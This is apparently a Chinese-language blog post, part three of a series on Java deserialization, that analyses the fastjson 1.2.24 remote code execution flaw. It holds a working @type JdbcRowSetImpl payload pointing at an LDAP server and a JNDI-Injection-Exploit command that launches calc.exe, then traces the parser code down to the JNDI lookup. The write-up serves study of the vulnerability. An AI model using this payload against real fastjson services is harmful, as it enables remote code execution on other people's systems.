java反序列化连续剧三

2020-03-28

写完了jndi注入，直接来看一下非常火的fastjson反序列化漏洞，基本也是基于jndi注入的。
首先来看下正常的fastjson的用法，其实就是一个json解析器，类似js的JSON.parse。在https://repo1.maven.org/maven2/com/alibaba/fastjson/1.2.24/下载需要的jar包。
先随便定义一个类Student,为了清楚观察get和set函数的调用加一些print。

public class Student {
    public String name;
    public int age;

    public Student() {
        System.out.println("构造函数");
    }

    public String getName() {
        System.out.println("getName");
        return name;
    }

    public void setName(String name) {
        System.out.println("setName");
        this.name = name;
    }

    public int getAge() {
        System.out.println("getAge");
        return age;
    }

    public void setAge(int age) {
        System.out.println("setAge");
        this.age = age;
    }
}

然后写个测试类

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.serializer.SerializerFeature;

public class fastjsonTest {
    public static void main(String[] args){
        Student student = new Student();
        student.setName("halfblue");
        student.setAge(18);
//
        System.out.println('1');
        String jsonstring = JSON.toJSONString(student);
        System.out.println(jsonstring);
        System.out.println('2');
        String jsonstring2 = JSON.toJSONString(student, SerializerFeature.WriteClassName);
        System.out.println(jsonstring2);
        System.out.println('3');
        Student obj = JSON.parseObject(jsonstring, Student.class);
        System.out.println('4');
        Object parse = JSON.parse(jsonstring);
        System.out.println('5');
        Object parse1 = JSON.parse(jsonstring2);

        System.out.println("type:"+ parse.getClass().getName() +" "+parse);
        System.out.println("type:"+ parse1.getClass().getName() +" "+parse1);
    }
}

构造函数
setName
setAge
1
getAge
getName
{"age":18,"name":"halfblue"}
2
getAge
getName
{"@type":"Student","age":18,"name":"halfblue"}
3
构造函数
setAge
setName
4
5
构造函数
setAge
setName
type:com.alibaba.fastjson.JSONObject {"name":"halfblue","age":18}
type:Student Student@6438a396

可以看到当指定了@type时，才能反序列化出指定类型的对象，并且这个过程会调用类的set方法。序列化时toJSONString时要加上SerializerFeature.WriteClassName参数才会指定@type。
实际上fastjson就是省去了我们自己写readObject的代码，直接实现了反序列化。那么问题就处在，如果反序列化时对对象类型设置的太过宽松，就可能引入任意类。如果该类的getter、setter、构造函数中有可被利用的代码就会导致代码执行。当然如果指定类的上述函数中有可被利用的代码也一样。

import com.alibaba.fastjson.JSON;

public class rcetest {
    public static void main(String[] args) {
        String jsonstring ="{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1389/allwbj\", \"autoCommit\":true}";
        JSON.parse(jsonstring);

    }
}

服务可以用java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C calc.exe -A 127.0.0.1这个工具开，比较方便
分析下原理，根据JSON.parse

public static Object parse(String text, int features) {
        if (text == null) {
            return null;
        } else {
            DefaultJSONParser parser = new DefaultJSONParser(text, ParserConfig.getGlobalInstance(), features);
            Object value = parser.parse();
            parser.handleResovleTask(value);
            parser.close();
            return value;
        }
    }

调用了DefaultJSONParser.parse，继续跟进是一个switch，跳到了case12

1
2
3

case 12:
          JSONObject object = new JSONObject(lexer.isEnabled(Feature.OrderedField));
          return this.parseObject((Map)object, fieldName);

再跟进JSONObject的parseObject，这里就是遍历解析输入字符串，获取类名，得到类名后走到TypeUtils.loadClass引入了该类，然后调用了FastjsonASMDeserializer.deserialze()

if (object.size() <= 0) {
    ObjectDeserializer deserializer = this.config.getDeserializer(clazz);
    thisObj = deserializer.deserialze(this, clazz, fieldName);
    return thisObj;
}

到deserialze函数就没办法动态调试了，最后看静态代码是调用了JdbcRowSetImpl的setDataSourceName和setAutoCommit这两个set函数，前者赋值了rmi/ladp服务地址，后者调用了InitialContext.lookup()引起了JNDI注入。
所以其实前面的代码都不重要，只是正常的反序列化过程。关键就是JSON.parse指定@type并赋值时会调用指定类的特定set方法，正好JdbcRowSetImpl的setAutoCommit方法存在JNDI注入。反序列化也只是个引子。

参考链接
http://www.mi1k7ea.com/2019/11/07/Fastjson%E7%B3%BB%E5%88%97%E4%BA%8C%E2%80%94%E2%80%941-2-22-1-2-24%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E